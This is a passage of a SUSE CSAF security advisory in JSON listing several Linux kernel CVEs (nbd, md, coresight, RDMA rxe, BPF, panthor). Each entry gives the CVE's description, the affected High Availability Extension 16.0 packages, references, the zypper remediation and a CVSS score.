(netlink without NBD_CFLAG_DESTROY_ON_DISCONNECT):\n connect // nbd_refs=2 (trigger recv_work)\n open nbd // nbd_refs=3\n NBD_CLEAR_SOCK // conf_refs=2\n close nbd\n nbd_release\n nbd_config_put // conf_refs=1\n nbd_put // nbd_refs=2\n recv_work done // conf_refs=0, nbd_refs=1\n rmmod // nbd_refs=0\n\nDepends-on: e2daec488c57 (\"nbd: Fix hungtask when nbd_config_put\")",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68372",
"url": "https://www.suse.com/security/cve/CVE-2025-68372"
},
{
"category": "external",
"summary": "SUSE Bug 1255537 for CVE-2025-68372",
"url": "https://bugzilla.suse.com/1255537"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68372"
},
{
"cve": "CVE-2025-68374",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68374"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmd: fix rcu protection in md_wakeup_thread\n\nWe attempted to use RCU to protect the pointer \u0027thread\u0027, but directly\npassed the value when calling md_wakeup_thread(). This means that the\nRCU pointer has been acquired before rcu_read_lock(), which renders\nrcu_read_lock() ineffective and could lead to a use-after-free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68374",
"url": "https://www.suse.com/security/cve/CVE-2025-68374"
},
{
"category": "external",
"summary": "SUSE Bug 1255530 for CVE-2025-68374",
"url": "https://bugzilla.suse.com/1255530"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68374"
},
{
"cve": "CVE-2025-68376",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68376"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ncoresight: ETR: Fix ETR buffer use-after-free issue\n\nWhen ETR is enabled as CS_MODE_SYSFS, if the buffer size is changed\nand enabled again, currently sysfs_buf will point to the newly\nallocated memory(buf_new) and free the old memory(buf_old). But the\netr_buf that is being used by the ETR remains pointed to buf_old, not\nupdated to buf_new. In this case, it will result in a memory\nuse-after-free issue.\n\nFix this by checking ETR\u0027s mode before updating and releasing buf_old,\nif the mode is CS_MODE_SYSFS, then skip updating and releasing it.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68376",
"url": "https://www.suse.com/security/cve/CVE-2025-68376"
},
{
"category": "external",
"summary": "SUSE Bug 1255529 for CVE-2025-68376",
"url": "https://bugzilla.suse.com/1255529"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68376"
},
{
"cve": "CVE-2025-68379",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68379"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nRDMA/rxe: Fix null deref on srq-\u003erq.queue after resize failure\n\nA NULL pointer dereference can occur in rxe_srq_chk_attr() when\nibv_modify_srq() is invoked twice in succession under certain error\nconditions. The first call may fail in rxe_queue_resize(), which leads\nrxe_srq_from_attr() to set srq-\u003erq.queue = NULL. The second call then\ntriggers a crash (null deref) when accessing\nsrq-\u003erq.queue-\u003ebuf-\u003eindex_mask.\n\nCall Trace:\n\u003cTASK\u003e\nrxe_modify_srq+0x170/0x480 [rdma_rxe]\n? __pfx_rxe_modify_srq+0x10/0x10 [rdma_rxe]\n? uverbs_try_lock_object+0x4f/0xa0 [ib_uverbs]\n? rdma_lookup_get_uobject+0x1f0/0x380 [ib_uverbs]\nib_uverbs_modify_srq+0x204/0x290 [ib_uverbs]\n? __pfx_ib_uverbs_modify_srq+0x10/0x10 [ib_uverbs]\n? tryinc_node_nr_active+0xe6/0x150\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x2c0/0x470 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\n? uverbs_fill_udata+0xed/0x4f0 [ib_uverbs]\nib_uverbs_run_method+0x55a/0x6e0 [ib_uverbs]\n? __pfx_ib_uverbs_handler_UVERBS_METHOD_INVOKE_WRITE+0x10/0x10 [ib_uverbs]\nib_uverbs_cmd_verbs+0x54d/0x800 [ib_uverbs]\n? __pfx_ib_uverbs_cmd_verbs+0x10/0x10 [ib_uverbs]\n? __pfx___raw_spin_lock_irqsave+0x10/0x10\n? __pfx_do_vfs_ioctl+0x10/0x10\n? ioctl_has_perm.constprop.0.isra.0+0x2c7/0x4c0\n? __pfx_ioctl_has_perm.constprop.0.isra.0+0x10/0x10\nib_uverbs_ioctl+0x13e/0x220 [ib_uverbs]\n? __pfx_ib_uverbs_ioctl+0x10/0x10 [ib_uverbs]\n__x64_sys_ioctl+0x138/0x1c0\ndo_syscall_64+0x82/0x250\n? fdget_pos+0x58/0x4c0\n? ksys_write+0xf3/0x1c0\n? __pfx_ksys_write+0x10/0x10\n? do_syscall_64+0xc8/0x250\n? __pfx_vm_mmap_pgoff+0x10/0x10\n? fget+0x173/0x230\n? fput+0x2a/0x80\n? ksys_mmap_pgoff+0x224/0x4c0\n? do_syscall_64+0xc8/0x250\n? do_user_addr_fault+0x37b/0xfe0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\n? clear_bhb_loop+0x50/0xa0\nentry_SYSCALL_64_after_hwframe+0x76/0x7e",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68379",
"url": "https://www.suse.com/security/cve/CVE-2025-68379"
},
{
"category": "external",
"summary": "SUSE Bug 1255695 for CVE-2025-68379",
"url": "https://bugzilla.suse.com/1255695"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68379"
},
{
"cve": "CVE-2025-68725",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68725"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbpf: Do not let BPF test infra emit invalid GSO types to stack\n\nYinhao et al. reported that their fuzzer tool was able to trigger a\nskb_warn_bad_offload() from netif_skb_features() -\u003e gso_features_check().\nWhen a BPF program - triggered via BPF test infra - pushes the packet\nto the loopback device via bpf_clone_redirect() then mentioned offload\nwarning can be seen. GSO-related features are then rightfully disabled.\n\nWe get into this situation due to convert___skb_to_skb() setting\ngso_segs and gso_size but not gso_type. Technically, it makes sense\nthat this warning triggers since the GSO properties are malformed due\nto the gso_type. Potentially, the gso_type could be marked non-trustworthy\nthrough setting it at least to SKB_GSO_DODGY without any other specific\nassumptions, but that also feels wrong given we should not go further\ninto the GSO engine in the first place.\n\nThe checks were added in 121d57af308d (\"gso: validate gso_type in GSO\nhandlers\") because there were malicious (syzbot) senders that combine\na protocol with a non-matching gso_type. If we would want to drop such\npackets, gso_features_check() currently only returns feature flags via\nnetif_skb_features(), so one location for potentially dropping such skbs\ncould be validate_xmit_unreadable_skb(), but then otoh it would be\nan additional check in the fast-path for a very corner case. Given\nbpf_clone_redirect() is the only place where BPF test infra could emit\nsuch packets, lets reject them right there.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68725",
"url": "https://www.suse.com/security/cve/CVE-2025-68725"
},
{
"category": "external",
"summary": "SUSE Bug 1255569 for CVE-2025-68725",
"url": "https://bugzilla.suse.com/1255569"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "moderate"
}
],
"title": "CVE-2025-68725"
},
{
"cve": "CVE-2025-68735",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68735"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\ndrm/panthor: Prevent potential UAF in group creation\n\nThis commit prevents the possibility of a use after free issue in the\nGROUP_CREATE ioctl function, which arose as pointer to the group is\naccessed in that ioctl function after storing it in the Xarray.\nA malicious userspace can second guess the handle of a group and try\nto call GROUP_DESTROY ioctl from another thread around the same time\nas GROUP_CREATE ioctl.\n\nTo prevent the use after free exploit, this commit uses a mark on an\nentry of group pool Xarray which is added just before returning from\nthe GROUP_CREATE ioctl function. The mark is checked for all ioctls\nthat specify the group handle and so userspace won\u0027t be abe to delete\na group that isn\u0027t marked yet.\n\nv2: Add R-bs and fixes tags",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68735",
"url": "https://www.suse.com/security/cve/CVE-2025-68735"
},
{
"category": "external",
"summary": "SUSE Bug 1255811 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1255811"
},
{
"category": "external",
"summary": "SUSE Bug 1256251 for CVE-2025-68735",
"url": "https://bugzilla.suse.com/1256251"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"SUSE Linux Enterprise High Availability Extension 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T11:32:45Z",
"details": "important"
}
],
"title": "CVE-2025-68735"
},
{
"cve": "CVE-2025-68741",
"ids": [
{
"system_name": "SUSE CVE Page",
